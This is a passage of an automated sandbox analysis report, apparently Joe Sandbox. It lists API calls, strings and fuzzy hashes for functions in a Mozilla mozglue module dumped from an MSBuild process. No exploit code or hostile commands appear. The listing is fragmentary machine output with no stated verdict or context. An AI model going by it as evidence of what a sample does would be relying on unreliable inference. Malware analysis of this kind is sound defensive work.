                                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CAC6D80
                                                                                                                                                                                                                                                                            • CertGetNameStringW.CRYPT32 ref: 6CAC6DC0
                                                                                                                                                                                                                                                                            • moz_xmalloc.MOZGLUE(00000000), ref: 6CAC6DDC
                                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6CAC6DEB
                                                                                                                                                                                                                                                                            • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6CAC6DFF
                                                                                                                                                                                                                                                                            • CertFreeCertificateContext.CRYPT32(00000000), ref: 6CAC6E10
                                                                                                                                                                                                                                                                            • CryptMsgClose.CRYPT32(00000000), ref: 6CAC6E27
                                                                                                                                                                                                                                                                            • CertCloseStore.CRYPT32(00000000,00000000), ref: 6CAC6E34
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32 ref: 6CAC6EF9
                                                                                                                                                                                                                                                                            • moz_xmalloc.MOZGLUE(00000000), ref: 6CAC6F7D
                                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6CAC6F8C
                                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6CAC709D
                                                                                                                                                                                                                                                                            • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6CAC7103
                                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CAC7153
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 6CAC7176
                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CAC7209
                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CAC723A
                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CAC726B
                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CAC729C
                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CAC72DC
                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CAC730D
                                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(?,00000000,00000110), ref: 6CAC73C2
                                                                                                                                                                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CAC73F3
                                                                                                                                                                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CAC73FF
                                                                                                                                                                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CAC7406
                                                                                                                                                                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CAC740D
                                                                                                                                                                                                                                                                            • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6CAC741A
                                                                                                                                                                                                                                                                            • moz_xmalloc.MOZGLUE(?), ref: 6CAC755A
                                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CAC7568
                                                                                                                                                                                                                                                                            • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6CAC7585
                                                                                                                                                                                                                                                                            • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CAC7598
                                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CAC75AC
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAEAB89: EnterCriticalSection.KERNEL32(6CB3E370,?,?,?,6CAB34DE,6CB3F6CC,?,?,?,?,?,?,?,6CAB3284), ref: 6CAEAB94
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAEAB89: LeaveCriticalSection.KERNEL32(6CB3E370,?,6CAB34DE,6CB3F6CC,?,?,?,?,?,?,?,6CAB3284,?,?,6CAD56F6), ref: 6CAEABD1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                                                                                                                                                                                                                            • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                                                                                                                                                                                                                            • API String ID: 3256780453-3980470659
                                                                                                                                                                                                                                                                            • Opcode ID: 0796dd56954f8bdbf965c6f5f3c4c4729b90a6e329a9dd3f9c54f14ee0ac9ee3
                                                                                                                                                                                                                                                                            • Instruction ID: ff52f078f890e7985139523db85c674986812a2df29cc8b5947fe4486db66677
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0796dd56954f8bdbf965c6f5f3c4c4729b90a6e329a9dd3f9c54f14ee0ac9ee3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8652A3B1A00258DBEB21DF24CD84BAE77B9EB45718F144199E90DE7640DB70AEC4CF92
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CAC64C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6CAC64DF
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6CAC64F2
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6CAC6505
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6CAC6518
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(user32.dll), ref: 6CAC652B
                                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CAC671C
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 6CAC6724
                                                                                                                                                                                                                                                                            • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6CAC672F
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 6CAC6759
                                                                                                                                                                                                                                                                            • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6CAC6764
                                                                                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6CAC6A80
                                                                                                                                                                                                                                                                            • GetSystemInfo.KERNEL32(?), ref: 6CAC6ABE
                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CAC6AD3
                                                                                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CAC6AE8
                                                                                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CAC6AF7
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                                                                                                                                                                                                                            • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                                                                                                                                                                                                                            • API String ID: 487479824-2878602165
                                                                                                                                                                                                                                                                            • Opcode ID: 1ba74c730150da8c86d0dae498ba06a22a5b7c437b53b201be6bff6fc13a3f44
                                                                                                                                                                                                                                                                            • Instruction ID: acf29f638cd3406cc12f90e6fdd6f15749f5e7d25bd557b1867eaef224c841e0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1ba74c730150da8c86d0dae498ba06a22a5b7c437b53b201be6bff6fc13a3f44
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 21F1E570A052299FDB20DF64CD48BEAB7B4AF45318F184299D81DA7781D731AEC4CF92
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CADED10 Relevance: 25.4, APIs: 16, Instructions: 5407COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6CADEE7A
                                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6CADEFB5
                                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,?), ref: 6CAE1695
                                                                                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CAE16B4
                                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6CAE1770
                                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6CAE1A3E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: memset$freemallocmemcpy
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3693777188-0
                                                                                                                                                                                                                                                                            • Opcode ID: f2a8e752f07a5cab40082f589b9ae840f68597a231a6d7f18106d2b7e03de75c
                                                                                                                                                                                                                                                                            • Instruction ID: 7271d2e8016b8b86dccd881b13b4bd85025d58ff6a67c8a9491553509ec468d9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f2a8e752f07a5cab40082f589b9ae840f68597a231a6d7f18106d2b7e03de75c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4FB33B71E00229CFCB14CFA9C890AADB7B2FF49304F1982A9D549AB755D730AD85DF90
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CADD4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(6CB3E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6CAED1C5), ref: 6CADD4F2
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(6CB3E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6CAED1C5), ref: 6CADD50B
                                                                                                                                                                                                                                                                              • Part of subcall function 6CABCFE0: EnterCriticalSection.KERNEL32(6CB3E784), ref: 6CABCFF6
                                                                                                                                                                                                                                                                              • Part of subcall function 6CABCFE0: LeaveCriticalSection.KERNEL32(6CB3E784), ref: 6CABD026
                                                                                                                                                                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6CAED1C5), ref: 6CADD52E
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(6CB3E7DC), ref: 6CADD690
                                                                                                                                                                                                                                                                            • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CADD6A6
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(6CB3E7DC), ref: 6CADD712
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(6CB3E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6CAED1C5), ref: 6CADD751
                                                                                                                                                                                                                                                                            • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CADD7EA
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                                                                                                                                                                                                                            • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                                                                                                                                                                                                                            • API String ID: 2690322072-3894294050
                                                                                                                                                                                                                                                                            • Opcode ID: 2b5290bc34ab56172f7f6c269c205cfd1aef20034f118f422389373ebdb4b4be
                                                                                                                                                                                                                                                                            • Instruction ID: 3dd85083471c4d416c73beb83fd4a6851d60b5b84dbc783f522db672bde92660
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b5290bc34ab56172f7f6c269c205cfd1aef20034f118f422389373ebdb4b4be
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8591E471E147518FD714CF28C59476AB7E1EB89318F1A492EE49A87A80D730F884CF91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CB02C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6CB02C31
                                                                                                                                                                                                                                                                            • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6CB02C61
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CAB4E5A
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CAB4E97
                                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CB02C82
                                                                                                                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CB02E2D
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAC81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6CAC81DE
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                                                                                                                                                                                                                                            • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                                                                                                                                                                                                                            • API String ID: 801438305-4149320968
                                                                                                                                                                                                                                                                            • Opcode ID: 9525ba0e6f1680b3618ca896fb7b6f0a232879e85090656aa8cda956c8c21e46
                                                                                                                                                                                                                                                                            • Instruction ID: b5a193ee56d6899a49279bf76cb5a09dc754fe3df4e5067eca19ccff7189701b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9525ba0e6f1680b3618ca896fb7b6f0a232879e85090656aa8cda956c8c21e46
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9591BE707087818FC724CF24C495AAEBBE1EF89258F104A1DE99A87750DB34D949CB53
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CB2545C Relevance: 6.6, APIs: 5, Instructions: 305COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(?,000000FF,?), ref: 6CB28A4B
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: memset
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2221118986-0
                                                                                                                                                                                                                                                                            • Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                                                                                                                                                                            • Instruction ID: a7bc3bb7ab0cdafeb003da4676b69c84827a538cbbd4524cc15ca49530113834
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 97B10972E0025A8FDB24CF68CC907E9B7B2EF95314F1802A9C44DDB785D734A989CB91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CB2542B Relevance: 6.5, APIs: 5, Instructions: 287COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(?,000000FF,?), ref: 6CB288F0
                                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6CB2925C
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: memset
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2221118986-0
                                                                                                                                                                                                                                                                            • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                                                                                                                                            • Instruction ID: 17acd0b7ab795d9c1b6775329d1e812cc6f26cc00c6069ce3f7e650a15c99a72
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F3B1C572E0024A8BDB14CF58CC816EDB7B2EF94314F180269C95DEB785D734A989CB90
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CB155F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(user32,?,6CAEE1A5), ref: 6CB15606
                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(gdi32,?,6CAEE1A5), ref: 6CB1560F
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6CB15633
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6CB1563D
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6CB1566C
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6CB1567D
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6CB15696
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6CB156B2
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6CB156CB
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6CB156E4
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6CB156FD
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6CB15716
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6CB1572F
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6CB15748
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6CB15761
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6CB1577A
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6CB15793
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6CB157A8
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6CB157BD
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6CB157D5
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6CB157EA
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6CB157FF
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                            • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                                                                                                                                                                                                                                                            • API String ID: 2238633743-1964193996
                                                                                                                                                                                                                                                                            • Opcode ID: ff29370bf292f6f614d9542ab34bfb9fd9ed9614d71e1a370fa6526841249486
                                                                                                                                                                                                                                                                            • Instruction ID: 8f58aefc439a2b8c70645f458a81a62927bb66312b22e0f686869b7abcc866ad
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff29370bf292f6f614d9542ab34bfb9fd9ed9614d71e1a370fa6526841249486
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A351B075705BA2AFDB11AF388D44A2E3BFCEB462567104829E819E3E45EF34CC048F65
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

